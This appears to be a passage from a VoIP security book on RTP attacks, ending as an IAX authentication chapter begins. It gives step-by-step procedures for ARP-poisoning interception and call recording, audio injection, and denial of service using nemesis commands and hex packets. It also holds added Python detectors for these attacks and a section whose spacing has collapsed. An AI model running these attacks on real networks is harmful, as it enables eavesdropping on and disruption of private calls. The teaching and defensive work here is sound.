A man-in-the-middle attack involves an untrusted third party intercepting communication between two trusted endpoints, as shown in Figure 4-2. For example, let's say two trusted parties, Sonia and Kusum, communicate via a telephone. In order to communicate with Kusum, Sonia dials her phone number. When Kusum answers the phone, Sonia begins the communication process with her. During a man-in-the-middle attack, an attacker intercepts the connection between Sonia and Kusum and has both endpoints communicate through him or her. In this way, the attacker effectively acts as the router between Sonia and Kusum. Both Kusum and Sonia continue to communicate, blissfully unaware of the attacker sitting in the middle of their call, listening in. The attack is like a three-way phone call, with two of the three callers unaware of the third one. The goal of a man-in-the-middle attack is to sniff on a switch, because switches direct traffic to the intended destination port only. Conversely, sniffing on a hub is possible by default because it allows all ports to see all communication, thereby making it quite easy to sniff a neighbor's traffic. Many switches are Layer 2 devices, meaning that they can transmit packets from one port on a switch to another node's machine address (MAC) instead of an IP address (type ipconfig /all on a Windows command line to see the MAC address noted by physical address). The MAC address is used by the manufacturer of the NIC to identify it uniquely. Layer 2 routing is common for performance reasons, allowing switches to transfer packets quickly across the network. The key to a man-in-the-middle attack is to update the switch, router, or operating system's ARP cache (Layer 2 routing table) and tell it that a specific IP address is now associated with a new MAC address (that of the attacker). When a system tries to contact the legitimate IP address via its Layer 2 MAC address, it will be routed to the attacker's machine because the system's ARP table was maliciously updated by the attacker.
Figure 4-2. Man-in-the-middle attack
In order to complete this attack as shown in Figure 4-2, an attacker would send an ARP reply packet to the two VoIP phones on the network, telling the VoIP phones that the IP address of 172.16.1.1 is now 00-A0-CC-69-89-74, which happens to be the Layer 2 MAC address of the attacker's machine. Once the ARP packets are received by the phones, the phones will automatically update their own ARP table, denoting 172.16.1.1 as 00-A0-CC-69-89-74. Once either VoIP phone tries to contact the switch at the IP address of 172.16.1.1, it will actually be redirected to the attacker's machine. In order for the man-in-the-middle attack to work as intended, the attacker must route that packet to the correct device, allowing both parties to communicate normally without knowing that a third party is monitoring the communication. For more information on man-in-the-middle attacks, refer to http://www.grc.com/nat/arp.htm/.
Using Cain & Abel for Man-in-the-Middle Attacks
Our example will use Cain & Abel (written by Massimiliano Montoro) to capture RTP packets, reassemble them, and decode them to .wav files. We'll start by using Cain & Abel to perform a man-in-the-middle attack on the entire network subnet and then use its RTP sniffer to capture all RTP packets and listen to the captured audio. Here are the step-by-step instructions:
1. Download and install Cain & Abel from http://www.oxid.it/cain.html/, using the defaults.
2. Install the WinPCap packet driver if you don't already have one installed.
3. Reboot.
4. Launch Cain & Abel.
5. Select the green icon in the upper left-hand corner that looks like a network interface card, as shown in Figure 4-3.
6. Ensure that your NIC has been identified and enabled correctly by Cain & Abel, then select the Sniffer tab.
7. Click the + symbol in the toolbar.
8. The MAC Address Scanner window will appear and enumerate all the MAC addresses on the local subnet. Click OK. (Figure 4-3 shows the results.)
Figure 4-3. MAC Address Scanner results
9. Select the APR tab at the bottom of the tool to switch to the ARP Pollution Routing tab.
10. Click the + symbol on the toolbar to show all the IP addresses and their MACs as shown in Figure 4-4.
Figure 4-4. IP addresses and their MACs
11. From the ARP Poison Routing menu, choose the target for your man-in-the-middle attack from the list of IP addresses and their corresponding MAC addresses as shown on the left in Figure 4-5. The most likely target will be the default gateway in your subnet so that all packets will go through you first before they reach the real gateway of the subnet.
12. Once you select your target, which is 172.16.1.1 in our example, select the VoIP endpoints (on the right side of the screen) from which you want to intercept traffic. You can choose all the VoIP endpoints in the subnet or a particular one. We'll choose 172.16.1.119, as shown in Figure 4-5. Click OK once you've made your selections.
Figure 4-5. Man-in-the-middle targets
13. When you've returned to the main screen, click the yellow-and-black icon (second from the left) to start the man-in-the-middle attack. This will allow the untrusted third party to start sending ARP responses on the network subnet, telling 172.16.1.119 that the MAC address of 172.16.1.1 has been updated to 00-00-86-59-C8-94, as shown in Figure 4-6.
Figure 4-6. Man-in-the-middle attack in process with ARP poisoning
14. At this point, all traffic from endpoint A to endpoint B is going through the untrusted third party first and then on its appropriate route. The untrusted third party can now use Cain & Abel, Wireshark, or a similar program to capture the RTP packets and reassemble them into a common audio format.
15. Select the Sniffer tab at the top of the program.
16. Select VoIP from the tabs at the bottom, as shown in Figure 4-7. If VoIP communication has occurred on the network using RTP media streams, Cain & Abel will automatically save the RTP packets, reassemble them, and save them to .wav format. As shown in Figure 4-7, Cain & Abel has captured a few phone conversations over the network.
Using Wireshark
To use Wireshark to reassemble RTP packets and save them to a .wav file, continue from step 14 above for the man-in-the-middle attack, and then complete the following steps:
1. Download and install Wireshark from http://www.wireshark.org/, using the defaults.
2. Install the WinPCap packet driver if you don't already have one installed.
Figure 4-7. Captured VoIP communication via RTP packets
3. Reboot.
4. Start Wireshark, then select Capture ► Interfaces from the menu bar.
5. Select Options from the interface you want to sniff.
6. In the Display Options section, select Update list of packets in real time, Automatic scrolling in live capture, and Hide capture info dialog.
7. Click Start.
8. Once Wireshark starts sniffing packets, enter RTP in the Filter text box and click Apply.
9. Once 15 or 20 RTP packets appear, stop the sniffer (Capture ► Stop).
10. Highlight one of the RTP packets.
11. Select Statistics ► RTP ► Stream Analysis, as shown in Figure 4-8.
Figure 4-8. Wireshark Stream Analysis of captured RTP packets
12. At this point, you will be shown more details of the RTP packets that have been sniffed over the network. Simply select the conversation (row) you wish to listen to and then click Save payload.
13. When the Save Payload As window appears, you are given the option to save the RTP stream to an audio file (assuming the codec used for the audio file is supported). Select the .au radio box as the format in which you wish to save the file, type the name of the file, and then click OK. (See Figure 4-9.)
Figure 4-9. Saving RTP packets to an audio file
14. Open and listen to the saved audio file.
Active Eavesdropping
In addition to passive eavesdropping attacks, RTP is also vulnerable to active attacks. The following attacks describe when an attacker can sniff on the network, using something like Wireshark, and then execute active attacks, such as voice injection, against VoIP endpoints supporting RTP. Injection attacks allow malicious entities to inject audio into existing VoIP telephone calls. For example, an attacker could inject an audio file that says "Sell at 118" between two stockbrokers discussing insider trading information. There are a few ways to inject voice communication between two VoIP endpoints. We'll discuss two methods, which are audio insertion and audio replacement. Both methods involve manipulation of the timestamp, session information, and SSRC of an RTP packet.
Audio Insertion
The session information between two VoIP endpoints is controlled by a 32-bit synchronization source (SSRC) as well as the 16-bit sequence number and the timestamp. The SSRC number is a random number that ensures any two endpoints will use different identifiers within the same RTP session. Although the likelihood of collision is low, the SSRC number ensures the uniqueness of the identifier. However, because the session information is sent in cleartext, attackers can view it over the network. Also, because most vendor VoIP products do not truly randomize any of the values, the ability to inject RTP packets from a spoofed source is possible. The sequential information allows attackers to predict the values for each state-controlling entity, which opens the door for injection attacks.
Note✎
Injection techniques were introduced in a tool called Hunt (available from http://packetstormsecurity.org/sniffers/hunt/hunt-1.5bin.tgz/), which would inject session information to hijack telnet connections.
RTP sessions are also vulnerable to injection attacks because the packets do not use random information for session management, in addition to the problem that the information is sent in cleartext. For example, for a given RTP session, the timestamp usually starts with 0 and increments by the length of the codec content (e.g., 160 ms); the sequence starts with 0 and increments by 1; and the SSRC is usually a static value for the session and a function of time. All three of these values are either predictable in nature and/or static. An attacker who is able to sniff the network can create packets with the correct timestamp, sequence, and SSRC information, ensuring that the packet increases appropriately as specified by the current session (usually by one). Once the attacker has predicted the correct information, he or she will be able to inject packets (audio) into an existing VoIP conversation. The ability to gather the correct information for the timestamp, sequence, and SSRC can be quite easy because all of the information traverses the network in cleartext. An attacker can simply sniff the network, read the required information for the attack, and inject new audio packets. Furthermore, because the information is not random, a tool can be written to automate the process and thus require little effort on the part of the attacker. Figure 4-10 shows an example of the RTP injection process. Notice that the attacker's SSRC number is the same as that of its target, but its sequence number and timestamp are in sync with the legitimate session, making the endpoint assume that the attacker's packets are part of the real session.
Figure 4-10. RTP injection
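A parser for the RTP header fields listed under RTP Basics, together with a check for the injected-packet pattern just described (same SSRC, sequence number and timestamp in step, different sender); this is an added example, not code from the book or from RTPInject, and the packets and addresses it uses are constructed.

```python
"""Decode RTP headers and flag packets injected into an existing stream.

Added example; not code from the book or from RTPInject.  parse_rtp()
decodes the header fields listed under "RTP Basics" (sequence number,
timestamp, SSRC, CSRC list); check_stream() applies the observation above
that an injected packet has to reuse the victim's SSRC and keep the
sequence number and timestamp in step, so on the wire it shows up as a
packet whose SSRC is already bound to a different sender, or as a second
packet with a sequence number the stream has already used.  All packets and
addresses below are constructed; build_rtp() exists only to create them.
"""
import struct

SAMPLES_PER_PACKET = 160   # 20 ms of 8 kHz audio: the "increments by 160" in the text


def parse_rtp(packet: bytes) -> dict:
    """Parse the 12-byte fixed RTP header plus any CSRC identifiers."""
    if len(packet) < 12:
        raise ValueError("RTP packet shorter than the fixed header")
    b0, b1, seq, timestamp, ssrc = struct.unpack("!BBHII", packet[:12])
    version, cc = b0 >> 6, b0 & 0x0F
    if version != 2:
        raise ValueError(f"unsupported RTP version {version}")
    if len(packet) < 12 + 4 * cc:
        raise ValueError("CSRC count exceeds packet length")
    csrcs = list(struct.unpack(f"!{cc}I", packet[12:12 + 4 * cc]))
    return {
        "padding": (b0 >> 5) & 1,
        "extension": (b0 >> 4) & 1,
        "marker": b1 >> 7,
        "payload_type": b1 & 0x7F,      # 0 = PCMU, 8 = PCMA, 3 = GSM, ...
        "seq": seq,
        "timestamp": timestamp,
        "ssrc": ssrc,
        "csrc": csrcs,
        "payload": packet[12 + 4 * cc:],
    }


def build_rtp(seq: int, timestamp: int, ssrc: int, payload_type: int = 0,
              payload: bytes = b"\xff" * 8) -> bytes:
    """Constructed packet for the demo: v=2, no padding/extension/CSRC, marker clear."""
    return struct.pack("!BBHII", 0x80, payload_type, seq & 0xFFFF,
                       timestamp & 0xFFFFFFFF, ssrc & 0xFFFFFFFF) + payload


def check_stream(observations, tolerance: int = 5):
    """observations: (src_ip, src_port, packet) tuples in arrival order.

    Returns [(index, reason)] for suspicious packets.  Reasons:
      source-mismatch  SSRC was first seen from another IP/port (the injector's socket)
      duplicate-seq    sequence number already seen for this SSRC
      out-of-step      sequence/timestamp do not match what the stream predicts
    Sequence-number wraparound is not handled; this is a demonstration.
    """
    bound, expect, seen, alerts = {}, {}, {}, []
    for i, (ip, port, pkt) in enumerate(observations):
        h = parse_rtp(pkt)
        ssrc = h["ssrc"]
        if ssrc not in bound:
            bound[ssrc], seen[ssrc] = (ip, port), set()
        else:
            if (ip, port) != bound[ssrc]:
                alerts.append((i, "source-mismatch"))
            if h["seq"] in seen[ssrc]:
                alerts.append((i, "duplicate-seq"))
            nseq, nts = expect[ssrc]
            gap = h["seq"] - nseq          # 0 normally, >0 after packet loss
            if abs(gap) > tolerance or h["timestamp"] != nts + gap * SAMPLES_PER_PACKET:
                alerts.append((i, "out-of-step"))
        seen[ssrc].add(h["seq"])
        if (ip, port) == bound[ssrc]:
            # Only the sender the SSRC is bound to advances the prediction.
            expect[ssrc] = (h["seq"] + 1, h["timestamp"] + SAMPLES_PER_PACKET)
    return alerts


def sample_observations():
    """Constructed capture: a PCMU stream from one phone with one injected packet."""
    phone, injector, ssrc = ("172.16.1.119", 16384), ("172.16.1.103", 40000), 0x1F2E3D4C
    obs = [(*phone, build_rtp(seq, (seq - 100) * SAMPLES_PER_PACKET, ssrc))
           for seq in range(100, 103)]
    # Injected: same SSRC, next sequence number and timestamp, but a different socket.
    obs.append((*injector, build_rtp(103, 3 * SAMPLES_PER_PACKET, ssrc, payload=b"\x00" * 8)))
    # The phone's own packet 103 then collides with the injected one.
    obs.append((*phone, build_rtp(103, 3 * SAMPLES_PER_PACKET, ssrc)))
    obs.append((*phone, build_rtp(104, 4 * SAMPLES_PER_PACKET, ssrc)))
    return obs


if __name__ == "__main__":
    for index, reason in check_stream(sample_observations()):
        print(f"packet {index}: {reason}")
```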
Complete the following steps to inject an audio file into an existing VoIP conversation.
1. Download RTPInject (written by Zane Lackey and Alex Garbutt) from http://www.isecpartners.com/tools.html/.
2. Follow the Readme.txt file for usage of a Windows machine. For the Linux version, RTPInject depends on the following packages, which are pre-installed on most modern Linux systems, such as Ubuntu, Red Hat, and BackTrack Live CD (must be run with root privileges):
Python 2.4 or higher
GTK 2.8 or higher
PyGTK 2.8 or higher
3. Install the pypcap library included with RTPInject by using the following commands:
bash# tar zxvf pypcap-1.1.tar.gz
bash# cd pypcap-1.1
bash# make all
bash# make install (*note: this step must be performed as root)
4. Install the dpkt library included with RTPInject by using the following commands:
bash# tar zxvf dpkt-1.6.tar.gz
bash# cd dpkt-1.6
bash# make install
5. Perform a man-in-the-middle attack on the network (if necessary) using dsniff (Linux) or Cain & Abel (Windows), as described earlier in this chapter, in order to capture all RTP streams in the local subnet.
6. Launch RTPInject using the following command:
bash# python rtpinject.py
7. Once RTPInject is loaded, it will show three fields in its primary screen, including the Source field, the Destination field, and the Voice Codec field. See Figure 4-11 for the details of the injection. The Source field will be auto-populated as RTPInject detects RTP streams on the network. When a new IP address appears in the Source field, click the IP address, which will show the destination VoIP phone and voice codec being used in the stream.
Figure 4-11. RTPInject main window
8. RTPInjectthenautomaticallytranscodestheprovided.wavfileintothecorrectcodec(becauseRTPInjectdisplaysthevoicecodecinuse,theusercouldalsocreatetheaudiofilewiththepropercodecheorshewishestoinject).UsingWindowsSoundRecorderorSoxforLinux,createanaudiofileinthefileformatshownbyRTPInject,suchasA-Law,u-Law,GSM,G.723,PCM,PCMA,and/orPCMU.a. OpenWindowsSoundRecorder(Start►Programs►
Accessories►Entertainment►SoundRecorder).b. ClicktheRecordbutton,recordtheaudiofile,andthen
clicktheStopbutton.c. SelectFile►SaveAs.d. ClickChange.UnderFormat,selectthecodecthatwas
displayedinRTPInject.SeeFigure4-12.BothWindowsSoundRecorderandLinuxSoxaudioutilitiesprovidetheabilitytotranscodeaudiotomostofthecommoncodecsused.
Figure4-12.WindowsSoundRecodercodec
e. ClickOKandthenSave.9. Oncethisaudiofilehasbeencreated,clickthefolder
buttononRTPInjectandnavigatetothelocationofthefilerecordedinStep6.SeeFigure4-13.
Figure4-13.Selectdialog
10. WiththeRTPstreamandaudiofileselected,clicktheInjectbutton.RTPInjectinjectstheselectedaudiofiletothedestinationhostintheRTPstream.SeeFigure4-14.
Figure4-14.InjectionaudiowithRTPInject
Audio Replacement

As mentioned previously, the session information between two VoIP endpoints is controlled by the SSRC, sequence number, and timestamp number. Unlike the audio insertion attack, the audio replacement attack does not inject audio during an existing phone conversation but replaces the existing audio during a call. For example, if two trusted endpoints are holding a phone conversation, an attacker can replace the legitimate audio information with the attacker's own information. Instead of hearing the communication from either source, the endpoints would be listening to what the attacker chooses. Audio replacement would be highly damaging in cases where many endpoints are listening to a single source, such as company conference calls. In order to replace the existing audio stream, the attacker needs to send RTP packets with a higher sequence number and timestamp, but using the same SSRC information. The target will then see RTP packets with a single SSRC number, one from the legitimate endpoint and one from the attacker. However, when the endpoint sees that the attacker's packet has a higher timestamp and sequence number, it will assume that the attacker's packets are the most current and thus continue on with its information. The higher sequence number and timestamp on the attacker's packets makes the legitimate endpoint's packet information look old and outdated. Old and outdated packet information would be discarded by the target in favor of the most recent information on the network, which in this case has been provided by the attacker. This technique allows the attacker's packet to look current while the endpoint's packets look old and invalid. As a result, the target receives the packet information from the attacker and plays the rogue audio information, which can be whatever the attacker wishes to play. For this attack to occur, the attacker's sequence information and session ID information must always be higher than that of the real endpoint. Figure 4-15 shows an example of the RTP replacement process. Notice that the attacker's SSRC number is the same as its target, but its sequence number and timestamp are much higher than in the legitimate session. This forces the receiving endpoint to assume that the legitimate phone's packets are old.

Figure 4-15. RTP injection: audio replacement
Denial of Service

There are many ways to carry out a Denial of Service attack on a VoIP infrastructure, including targeting the RTP protocol. Denial of Service attacks are a lot easier to carry out on session setup protocols, such as attacks on H.323 and SIP, but can also be performed on RTP. Unlike H.323 and SIP, when a DoS attack occurs on the RTP protocol itself, the impact is higher as the RTP protocol controls the audio portion of a call. This section discusses the following types of RTP DoS attacks (there are several more RTP DoS attacks, but this section will discuss only the top three):

Message flooding
RTCP BYE (session teardown)
SSRC injection
Message Flooding

The easiest way to carry out a DoS attack during an RTP session is to flood one end of an existing VoIP call with an enormous amount of RTP packets. Because authentication is assumed to have been provided by other protocols, such as H.323 or SIP, RTP endpoints are forced to review each packet sent to them (assuming they are all packets of an existing call). During a call, two entities send RTP packets to each other, containing the audio information for the call. The RTP packets identify the unique call based on the SSRC number. Every time an RTP packet is received by an endpoint with the same SSRC value, a certain amount of time is required for the endpoint to review the packet and determine whether to accept or drop it, even if that packet turns out to be bogus with incorrect information. Repeated over and over several thousand times a second, this packet review can be costly. The legitimate RTP packets must compete for the endpoint's time or wait in line for review, causing the existing RTP communication stream to slow down or simply stop. A slowdown or stoppage in the RTP stream will disrupt the call, leading to a Denial of Service attack. Complete the following steps to execute a DoS attack on RTP communication.

1. Using Nemesis or SnifferPro, create an RTP packet and send it to an endpoint that has an existing VoIP call with RTP packets. We'll use Nemesis, which can be found at http://www.packetfactory.net/projects/nemesis/, from the BackTrack Live CD.

2. Start Nemesis from the BackTrack Live CD.

3. Sniff the network and find an existing VoIP call using RTP. Note the source IP, destination IP, and ports being used with RTP.

4. Download iSEC.RTP.Flood.DOS from http://labs.isecpartners.com/HackingVoIP/HackingVoIP.html/. We'll use this as the input file with Nemesis in order to execute the RTP DoS attack.

5. With a hex editor, edit the SSRC information to match the one you have sniffed over the network. The author's SSRC number is 909524487 (step 8), but this value should be changed to match the value of the call you wish to terminate.

6. Once the file is downloaded, execute the nemesis command in step b using the previous lab information:
   a. Network Information
      i. Attacker's IP: 172.16.1.103
      ii. Attacker's MAC: 00:05:4E:4A:E0:E1
      iii. Target's IP: 172.16.1.140
      iv. Target's MAC: 02:34:4F:3B:A0:D3
      v. Existing RTP port (this must be sniffed by the attacker): 42550
   b. Example Syntax:
      nemesis udp -x 42550 -y 42550 -S 172.16.1.103 -D 172.16.1.140 -H 00:05:4E:4A:E0:E1 -M 02:34:4F:3B:A0:D3 -P iSEC.RTP.Flood.DOS

7. Issue the command repeatedly for as long as you want the DoS attack to occur (it might be better to create a script to repeat this indefinitely).

8. The following hex information is the example packet with RTP flood information. Be sure to use a hex editor if you wish to modify this file for use with Nemesis:

800018232f1d8e8d36363e07e9ead4d0ec5c517bcdd55defdbf372e6d97e6c756257edd2e74c445ce25b4ad5c577e8c7c0d8545efc55454f473b3530487c63cdc0cacab2bbb6b475dae53c36373e3e354af66a74e2c3bdb8bbbfc4d7dae64b456aef4e46506dc1d0d0bfcad76b766b3e3f4b4b635deac5483fa4b42fbab6354fb93b2b38e3ad5548b25e3bcbb24e3dc0bac73240bc4847c0f33462bed8e2553d45d8b3c7373dc7c24c5fdd5c

Done! You are now flooding a VoIP endpoint with an RTP communication stream with bogus RTP packets. Over time, the existing call should be slowed down or simply dropped (depending on how long you send the above packet).
RTCP BYE (Session Teardown)

The next Denial of Service attack we will discuss uses spoofed information. During an RTP connection, RTCP can be used for synchronization, Quality of Service management, and several other session setup, maintenance, and teardown responsibilities. As with the message flooding issue, RTP assumes that authentication has taken place with other protocols; hence, any packet sent to it is considered for review. As a consequence, an attacker who can sniff the network can spoof an RTCP BYE packet and force the endpoint to terminate the call. An RTCP BYE message simply indicates that one of the endpoints is no longer active or that the RTP session should not be used any longer. BYE messages can occur for a variety of reasons, ranging from duplicate SSRC messages to a disappearing endpoint. If a BYE message is received by an endpoint, that endpoint assumes that the other endpoint it has been communicating with can no longer receive or send RTP communication; thus, the session is closed. In order for the BYE message to be spoofed by an attacker and used to end a call, the attacker needs to know the correct source, destination, port, and SSRC information between the two parties to an existing VoIP call. Complete the following steps to execute a DoS attack using RTCP BYE messages.

1. Using Nemesis or SnifferPro, create an RTP packet and send it to an endpoint that has an existing VoIP call with RTP packets. We'll use Nemesis in this example.

2. Start Nemesis from the BackTrack Live CD (http://nemesis.sourceforge.net/).

3. Sniff the network for an existing VoIP call using RTP. Note the source IP, destination IP, ports, and SSRC information being used with the call.

4. Download iSEC.RTCP.BYE.DOS from http://labs.isecpartners.com/HackingVoIP/HackingVoIP.html/ to be used as the input file with Nemesis in order to execute the RTCP DoS.

5. With a hex editor, edit the SSRC information to match the one you have sniffed over the network. The author's SSRC number is 909524487 (as in step 8). Change this value to match the value of the call you wish to terminate.

6. Once the file is downloaded and has been updated, execute the nemesis command in step b with the previous lab information in step a:
   a. Network Information
      i. Attacker's IP: 172.16.1.103
      ii. Attacker's MAC: 00:05:4E:4A:E0:E1
      iii. Target's IP: 172.16.1.140
      iv. Target's MAC: 02:34:4F:3B:A0:D3
      v. Existing RTP port (this must be sniffed by the attacker): 42550
   b. Example Syntax:
      nemesis udp -x 42550 -y 42550 -S 172.16.1.103 -D 172.16.1.140 -H 00:05:4E:4A:E0:E1 -M 02:34:4F:3B:A0:D3 -P iSEC.RTCP.BYE.DOS

The following hex information is the example packet with RTCP BYE information:

81cb000c36363e07

Done! You have sent an RTCP BYE message to a VoIP endpoint with an existing RTP communication stream. Once the endpoint processes the packet, the call should be slowed down and then dropped.
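The injection, audio replacement, flooding, and RTCP BYE attacks above all leave a signature in the header fields the chapter discusses: a duplicated sequence number, a sequence jump with the same SSRC, a burst of packets for one SSRC, or a BYE for a stream that is still carrying audio. The following monitor, added here as an example (it is not code from the book or from any of the tools it mentions), parses the RTP and RTCP headers and flags each condition; the stream it replays is constructed, and the two header values it checks against are the chapter's own packets (SSRC 0x36363e07, decimal 909524487). The thresholds SEQ_JUMP_LIMIT and FLOOD_PPS are assumed tuning values, not protocol constants.

```python
"""Per-SSRC RTP/RTCP sanity monitor (added example, not from the book)."""
import struct
from collections import defaultdict

RTCP_BYE = 203          # RTCP packet type for BYE (RFC 3550)
SEQ_JUMP_LIMIT = 100    # assumed: seq gap beyond which we call the stream "jumped"
FLOOD_PPS = 500         # assumed: packets per second for one SSRC before alerting


def parse_rtp(pkt: bytes) -> dict:
    """Decode the 12-byte fixed RTP header (RFC 3550): V/P/X/CC, M/PT, seq, ts, SSRC."""
    if len(pkt) < 12:
        raise ValueError("RTP packet too short")
    b0, b1, seq, ts, ssrc = struct.unpack("!BBHII", pkt[:12])
    if b0 >> 6 != 2:
        raise ValueError("not RTP version 2")
    return {"pt": b1 & 0x7F, "marker": bool(b1 & 0x80), "seq": seq, "ts": ts, "ssrc": ssrc}


def parse_rtcp(pkt: bytes) -> dict:
    """Decode the common RTCP header; enough to recognise a BYE and its SSRC."""
    if len(pkt) < 8:
        raise ValueError("RTCP packet too short")
    b0, pt, length, ssrc = struct.unpack("!BBHI", pkt[:8])
    return {"pt": pt, "count": b0 & 0x1F, "length": length, "ssrc": ssrc}


def make_rtp(seq: int, ts: int, ssrc: int = 0x36363E07, pt: int = 0) -> bytes:
    """Constructed test packet: RTP header plus 160 bytes of PCMU silence (20 ms)."""
    return struct.pack("!BBHII", 0x80, pt, seq & 0xFFFF, ts & 0xFFFFFFFF, ssrc) + b"\xff" * 160


class RtpMonitor:
    """Tracks the last seq/ts/time seen per SSRC and the packet rate per second."""

    def __init__(self):
        self.state = {}                  # ssrc -> {"seq", "ts", "t"}
        self.counts = defaultdict(int)   # (ssrc, whole second) -> packets seen

    def observe_rtp(self, pkt: bytes, t: float) -> list:
        h = parse_rtp(pkt)
        ssrc, alerts = h["ssrc"], []
        self.counts[(ssrc, int(t))] += 1
        if self.counts[(ssrc, int(t))] > FLOOD_PPS:
            alerts.append(f"flood: ssrc={ssrc:#x} exceeds {FLOOD_PPS} pkt/s")
        prev = self.state.get(ssrc)
        if prev is not None:
            gap = (h["seq"] - prev["seq"]) & 0xFFFF      # modulo-2^16 distance
            if gap == 0:
                alerts.append(f"duplicate seq {h['seq']} ssrc={ssrc:#x}: possible injection")
            elif SEQ_JUMP_LIMIT < gap < 0x8000:          # far ahead, not a reorder
                alerts.append(f"seq jump +{gap} ssrc={ssrc:#x}: possible audio replacement")
        self.state[ssrc] = {"seq": h["seq"], "ts": h["ts"], "t": t}
        return alerts

    def observe_rtcp(self, pkt: bytes, t: float) -> list:
        h = parse_rtcp(pkt)
        if h["pt"] != RTCP_BYE:
            return []
        prev = self.state.get(h["ssrc"])
        if prev is not None and t - prev["t"] < 1.0:     # stream still carrying audio
            return [f"RTCP BYE for active ssrc={h['ssrc']:#x}: possible spoofed teardown"]
        return []


def demo() -> dict:
    """Replay a constructed 20 ms PCMU stream, then each attack, and collect alerts."""
    mon = RtpMonitor()
    out = {"baseline": [], "injection": [], "replacement": [], "flood": [], "bye": []}
    for i in range(50):                                   # seq +1, ts +160 every 20 ms
        out["baseline"] += mon.observe_rtp(make_rtp(i, i * 160), 10.0 + i * 0.02)
    out["injection"] += mon.observe_rtp(make_rtp(49, 49 * 160), 11.0)      # in-sync copy
    out["replacement"] += mon.observe_rtp(make_rtp(5049, 5049 * 160), 11.02)
    flood_pkt = bytes.fromhex("800018232f1d8e8d36363e07") + b"\x00" * 160  # book header
    for i in range(600):
        out["flood"] += mon.observe_rtp(flood_pkt, 12.0 + i * 0.001)
    out["bye"] += mon.observe_rtcp(bytes.fromhex("81cb000c36363e07"), 12.7)
    return out


if __name__ == "__main__":
    for kind, alerts in demo().items():
        print(f"{kind}: {len(alerts)} alert(s)", alerts[:1])
```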
Summary

RTP is the most popular communication protocol for VoIP networks. Whether it is used with SIP or H.323, it is responsible for the audio communication once a call has been set up. While SIP and H.323 have their own security issues, the use of RTP introduces many more. RTP assumes that a significant amount of security is coming from elsewhere during a VoIP call, allowing it to be absent of many basic security protections with authentication, authorization, and encryption. The primary items used to control RTP packets between any two entities are the session information, timestamp, and SSRC information. All of these items are easily spoofable by attackers or unauthorized internal users, allowing malicious personnel to perform several types of attacks directly on RTP, including eavesdropping, voice injection, and Denial of Service. Eavesdropping, voice injection, and Denial of Service attacks are basically the worst-case scenario for any voice conversation, for the following reasons:

The ability of attackers to listen to phone calls between two trusted entities removes any guarantee of confidentiality on a VoIP call.
The ability of an attacker to inject audio during existing conversations eliminates the integrity of a VoIP call.
The ability of attackers to end a call forcibly eliminates the reliability of the VoIP call.

Without confidentiality, integrity, and reliability, RTP sessions are left sorely lacking in security. When building a VoIP network using RTP, it is important to know about the major problems with authentication, authorization, and encryption that stem from its nature as cleartext communication. This chapter has focused on the flaws with RTP so that users may understand the risk. Chapter 9 will discuss defenses, including possible defenses to RTP, such as Secure RTP.
Chapter 5. SIGNALING AND MEDIA: IAX SECURITY

Inter-Asterisk eXchange (IAX[2]) is a protocol used for Voice over IP (VoIP) communication with Asterisk servers (http://www.asterisk.org/), an open source PBX system. Along with Asterisk servers, IAX can be used between any client endpoint[3] and server system supporting the IAX protocol for voice communication. IAX is much simpler than other VoIP protocols such as H.323. For instance, IAX uses a single UDP port (port 4569) between all endpoints and servers. This feature makes IAX very attractive for firewall administrators, who are often asked to open many ports higher than 1024 for VoIP communication. Additionally, IAX provides for both signaling and media transfer within the protocol itself, while other VoIP implementations use separate protocols, like H.323 or SIP for signaling and RTP for media transfer. The use of multiple ports/protocols in VoIP often makes the network more confusing than figuring out where the Line of Control sits between India and Pakistan. Regarding security, the draft RFC tells us that IAX uses a binary protocol and claims to offer a higher degree of protection against buffer overrun attacks[4] than ASCII protocols such as SIP. IAX also offers RSA public-key authentication and call confidentiality through AES. However, despite the importance of these security features, they are frequently absent in IAX deployments. This leaves many IAX implementations as vulnerable as unprotected SIP or H.323 systems. Because IAX still supports cleartext communication, unencrypted voice conversations can be sniffed, recorded, and replayed by eavesdroppers. The commonly used MD5 challenge/response authentication mechanism specified by IAX also allows passive and active adversaries to launch several kinds of attacks. These attacks include offline dictionary attacks on credentials and pre-computed dictionary attacks. Additionally, MD5 authentication is often vulnerable to man-in-the-middle attacks and potentially to downgrade attacks (depending upon the implementation). Finally, several Denial of Service attacks are possible, adding to the availability concerns of IAX (i.e., services being up and running). Similar to any unauthenticated nonprivate protocol, many dated security attacks can be carried out, regardless of whether the communication is using IAX, SIP, H.323, RTP, SCCP, or any other VoIP protocol. This chapter will focus on IAX, but the attack classes can be assumed for any protocol with similar structure. For more information on the IAX architecture, see http://tools.ietf.org/html/draft-guy-iax-04/. The RFC is currently in draft, so there will be many revisions to it before final approval. The security aspects supported by IAX implementations will be the primary focus of this chapter, specifically authentication, password protection, and availability.
IAX Authentication

IAX supports three authentication methods: MD5 authentication, plaintext authentication, and RSA authentication. RSA authentication is not widely deployed; however, it is the strongest security option. The attack surface (the exposure any entity has to an attack) for RSA authentication is not only small, but its use of public and private keys greatly strengthens the authentication model against passive and active network attacks. Conversely, plaintext authentication is by far the worst method to be used with IAX. Plaintext authentication passes the username and password in the clear, making the network vulnerable to numerous attacks and passive eavesdroppers. The most widely used authentication method is MD5. In the MD5 authentication process, IAX endpoints use a challenge/response system based on MD5 hashes. This method protects against the use of cleartext passwords over the network as well as replay attacks. However, the authentication scheme is vulnerable to common authentication attacks, including dictionary attacks. The protocol also requires storage of the actual password as the password verifier,[5] increasing the likelihood of a server compromise. In general, MD5 allows any weak or strong password to be hashed without sending the password over the network in cleartext. For example, if an endpoint were to use the password Sonia, which is a weak password because it has only five characters and no numbers, the MD5 hash that would be used is CCD5614CD5313D6091A96CE27C38EB22. While creating an MD5 hash ensures that the password is not sent over the network in cleartext, it exposes another problem, which is the use of password-equivalent values. Password-equivalent values create two potential security risks. First, the MD5 hash value of Sonia is always the same, making it vulnerable to a replay attack. An attacker could simply sniff the MD5 hash over the network and use it later to be authenticated. The attacker does not need to know what the real password is, because the MD5 hash (the password-equivalent value) is what is sent to the authenticating device. Second, to speed up the process, the attacker could simply create an MD5 hash for every word in the dictionary (a pre-computed, brute-force attack) and send those values to the authenticating device. While the attacker would not know the correct password, eventually she would send an MD5 hash that matches a hash for a correct password. In order to prevent replay attacks, IAX supports the challenge/response method. This means that IAX's MD5 authentication does not require the use of a password or a password-equivalent value. Instead, an authenticator, such as an Asterisk server, sends a challenge to the endpoint for each unique authentication request. For example, if an IAX endpoint tried to authenticate five different times, it would be given one challenge for each of the five authentication attempts. Once the endpoint receives the challenge from the authenticator, the endpoint concatenates the challenge with 